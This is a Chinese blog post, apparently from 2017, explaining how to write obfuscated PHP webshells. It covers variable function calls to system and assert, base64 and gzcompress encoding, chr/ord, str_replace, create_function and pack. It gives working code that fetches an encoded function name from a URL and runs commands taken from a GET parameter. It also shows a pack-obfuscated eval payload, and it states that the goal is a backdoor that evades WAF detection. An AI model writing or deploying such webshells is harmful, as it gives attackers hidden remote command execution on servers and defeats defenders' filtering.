2. 程式人生 > >php webshell常見函數

php webshell常見函數

阿新 發佈:2017-06-27
轉碼 targe pla enc ebs pack ace waf 字符

0x1

直接在字符串變量後面加括號, 會調用這個函數:

<?php
$s = ‘system‘;
$e = ‘assert‘;
$s(‘whoami‘);
$e(‘phpinfo();‘);

0x2

執行命令常用的函數有:

system(‘命令‘eval(‘php code‘)
assert(‘php code‘)

這三個最常用

0x3

base64_encode/base64_decode

<?php
$b = base64_encode(‘whoami‘);
echo $b.‘<br />‘;
echo base64_decode($b).‘<br />‘;

0x4

gzcompress/gzuncompress 壓縮數據

<?php
$c = gzcompress(‘whoami‘);
echo $c.‘<br>‘;
echo gzuncompress($c)."<br />";

0x5

從上面的命令執行, base64加解64編碼與gz壓縮, 我們可以寫一個這樣的後門。

先把後門壓縮, 再把後門base64_encode(base64編碼後防止字符原因代碼出錯)。

如果後門是一個php代碼的話, 在最後我們可以用assert或eval執行它。

在php中, 有一個這樣的函數:

file_get_contents
 
(url)

用這個函數可以遠程獲取文件內容保存到變量中:

$shell = file_get_contents(‘http://localhost/shell.jpg‘)

開始測試, 從最簡單例子開始。

制作gzcompress與base64_encode編碼過的文件:

<?php
$c = ‘system‘;
$data = gzcompress($c);
$file_data = base64_encode($data);
echo $file_data;
fwrite(fopen(‘shell.txt‘, ‘w‘), $file_data);

這樣我們就創了一個壓縮後再64編碼的system字符串

使用:

<?php
$c = file_get_contents(‘http://localhost/shell.txt‘);
#獲取數據
$s = gzuncompress(base64_decode($c));
#解密數據

$s($_GET[session]);
#執行命令

那麽問題來了, 我們為什麽要轉了一大圈再回來呢?

原因很簡單, 就是你壓縮後的數據, 有可能一些WAF並不會檢測到內容存在危險。

0x6

ascii轉碼函數: chr/ord

<?php
$str = ‘system‘;
for($count = 0; $count < strlen($str); $count++){
    echo substr($str, $count, 1).‘~‘.ord(substr($str, $count, 1)).‘<br />‘;
}
/*
s~115
y~121
s~115
t~116
e~101
m~109*/

0x7

str_replace字符替換函數:

<?php
$s = str_replace(‘p‘,‘‘,‘pspypsptpepmp‘);
echo $s;
#system

0x8

create_fuction()創建匿名函數:

<?php
#create_function(‘參數列表‘, ‘php代碼字符串‘);
$info = create_function(‘‘,‘phpinfo();‘);
$info();

0x9

pack函數

pack(‘格式‘, 十六進制字符串)

pack函數有點復雜, 但不常用, 如果你要把一個十六進制轉成字符, 可以這樣:

<?php
$x = bin2hex(‘system‘);
$s = PACK(‘H*‘, $x);
echo $s.‘<br />‘;
$s(‘whoami‘);

pack關鍵用法就是, 我們可以把一些第感的函數, 先轉成16進制, 再 pack回來。

比如, create_function(‘‘, $shell)中, $shell為php code代碼, 我們可以在php code中利用隱藏一些敏感函數。

<?php
$shell=PACK(‘H*‘,‘2470617373776F72643D27‘).$password.
PACK(‘H*‘,‘273B247368656C6C6E616D653D27‘).$Username.
PACK(‘H*‘,‘273B246D7975726C3D27‘).$Url.
PACK(‘H*‘,‘273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827‘).‘
eJzs/Xt3HNd5Jor/zazl71Buw2rAwqXu1UUQsOpKgheABEBSlK
iD02g0gCYaaKi7QYCi+GEczZxoHM+KJetiWzdbkmNZsi1FkmXH
yzOT8WQyk/HPcybJTJKZJLN+z7N3VXVVX0BQtpPJOoZEoLtq3/
d73+/77tb6WqdbbXfHJ2Y/8zsb9c3GXn28vHunurHRrnc65cmx
tZVo+Vq0/Hh5JVheuLy6Fi9cjBa9S1H5iXyN/Vanu18VFfjnsN
XeyL/ubNebzb3qbh3vs8/FHg/aTbwUf/misTn+yFa9u7Zb3WrU
.......


$f = create_function(‘‘, $shell);
$f();

pack用法可以參孝一下這裏: perl pack

總結

創建一個gz壓縮再base64編碼的文件(如 logo.png), 利用file_get_contents獲取。

利用str_replace/chr/ord/create_fuction函數繞過一些WAF檢測。

php webshell常見函數

相關推薦

php webshell常見

轉碼 targe pla enc ebs pack ace waf 字符 0x1 直接在字符串變量後面加括號, 會調用這個函數: <?php $s = ‘system‘; $e = ‘assert‘; $s(‘whoami‘); $e(‘phpinfo();‘);

php中處理字符串的常見

字符串的查找 func xpl keyword 包含 不用 但是 padding lsp 編寫程序的時候,經常要處理字符串,最基本就是字符串的查找,在php檢測字符串中是否包含指定字符串可以使用正則,如果你對正則不了解,那麽有幾個函數可以為您提供方便。 1. strstr

java常見

ont pan 中間 cout 結束 clas span 註意 後綴 1、trim():去掉字符序列左邊和右邊的空格 例如:str = " ai lafu yo ";str = trim(str);cout << str;輸出的將是"ai lafu yo"

msql常見

def osi form plc ger 而且 reverse 相等 encrypt 一、數學函數ABS(x) 返回x的絕對值BIN(x) 返回x的二進制(OCT返回八進制,HEX返回十六進制)CEILING(x) 返回大於x的最小整數值EXP(x) 返回值

php--轉碼

效率 區別 gb2312 第一個 color -s ring enc pan 最近在用dedecms二次開發會員功能;大家都知道dedecms編碼是GBK格式的;所以在我們在項目中經常需要轉碼,在我了解中有兩種轉碼方式:一是:iconv;二是mb_convert_encod

JavaScript認識,Js中的常見

ret ets dex 數學 1-1 做成 認識 tolower 其他 JavaScript函數: 也稱為方法,用來存儲一塊代碼,需要的時候調用。 函數是由事件驅動的或者當它被調用時執行的可重復使用的代碼塊。 函數需要包含四要素:返回類型,函數名,參數列表,函數體 拓展:強

PHP】 mysqli_autocommit()

連接 操作 strong function lba row article 保護 sqli //獲取每一篇文章的內容 function getPost($f_parent_id, $f_title, $f_username, $f_board_id,$f_post_tim

(四)Oracle學習筆記—— 常見

出現 3.4 date 常用 字符串類型 添加 轉換 sign 首字符 1. 字符串類型及函數 字符類型分 3 種,char(n) 、varchar(n)、varchar2(n) ; char(n)固定長度字符串,假如長度不足 n,右邊空格補齊; varchar(

PHP中spl_autoload_register的用法

版本 說明 standard rar 自己 cli class a class got spl_autoload_register(PHP 5 >= 5.1.2) spl_autoload_register — 註冊__autoload()函數 說明bool spl_

PHP日期和

足夠 mkt class 嘗試 str posix etc timezone strong 第11章 PHP日期和函數 UNIX時間戳 UNIX時間戳,又被稱之為UNIX時間,POSIX時間,是指從格林威治時間1970年1月1日0時0分0秒到現在的秒數,就被稱之為時間

php-類型

語句 eric print oat tty 指定 轉換 常用 var_dump /* 【類型操作函數】 */ //獲取/設置類型 gettype($var) //獲取變量的數據類型 settype($var, $type) //設置變量的數據類型 //類型判斷 is_i

php遞歸

php遞歸函數一個函數在它的函數體內調用它自身稱為遞歸調用。這種函數稱為遞歸函數(視頻裏看到這種函數)function mk($d=1) { //出口 if($d == 10) { echo ‘第‘, $d, ‘天,有‘, ‘1‘, ‘個棗子<br>‘; return 1; } //遞歸點 $

總結一些PHP文件有哪些

exe time() nbsp cut 常用 dir() writeable 一個 table 簡單整理一些PHP的操作文件常用函數: filetype() 獲取文件類型函數 is_dir()  判斷給定的文件名是否是一個目錄   is_executable()  判斷

PHP通過exec實現對APK自動簽名

php android apk簽名 公司開發的Android應用,因為在不同平臺下簽名文件不一樣,需要分別進行簽名,這個很麻煩,於是要求在公司的後臺管理系統中能夠對上傳的APK文件,自動使用不同平臺的簽名文件完成簽名,這樣只需要上傳一次文件就得到所有平臺簽名後的APK了,分發起來方便不少。 具

php 利用scandir() 掃描出制定目錄下的所有文件

for log scan echo 壓縮文件 引號 sta 舉例 logs //遍歷子文件夾和文件夾的內容 並且計算出文件的多少   //一個demo 引號替換下function scan($dir){ static $i=0; static $d=0;

php自定義: amr轉mp3格式

com pre php mp3 ams highlight cti ror cal <?php function amr2mp3($file){ if (file_exists($file . ‘.mp3‘) == true) { retur

php回調call_user_func和call_user_func_array詳解

call http 如何 必須 類實例化 一個 開發者 all 而已 call_user_func($fun); call_user_func 函數類似於一種特別的調用函數的方法,使用方法如下: 1.調用 普通函數: <?php funct

php內置獲取圖片類型-exif_imagetype

ron div echo tro jpeg mage 圖片 int image 在PHP獲取圖片類型可以使用PHP內置函數中的 exif_imagetype 預定義常量定義有以下常量,並代表了 exif_imagetype() 可能的返回值: 圖像類型常量 值 常量

使用PHP內置 uniqid 和Md5可以生成一個唯一的ID

基本上 ica md5 each pre pri arr 基本 d+ 在高並發中 用Uniqid+MD5基本上沒有重復的id <?php $units = array(); for($i=0;$i<1000000;$i++){

PHP 5 Array

數量 小寫 pos 自定義函數 應用 過濾 隨機 一個 multi PHP 5 Array 函數 PHP Array 簡介 PHP Array 函數允許您訪問並操作數組。 支持簡單的數組和多維數組。 安裝 PHP Array 函數是 PHP 核心的組成部分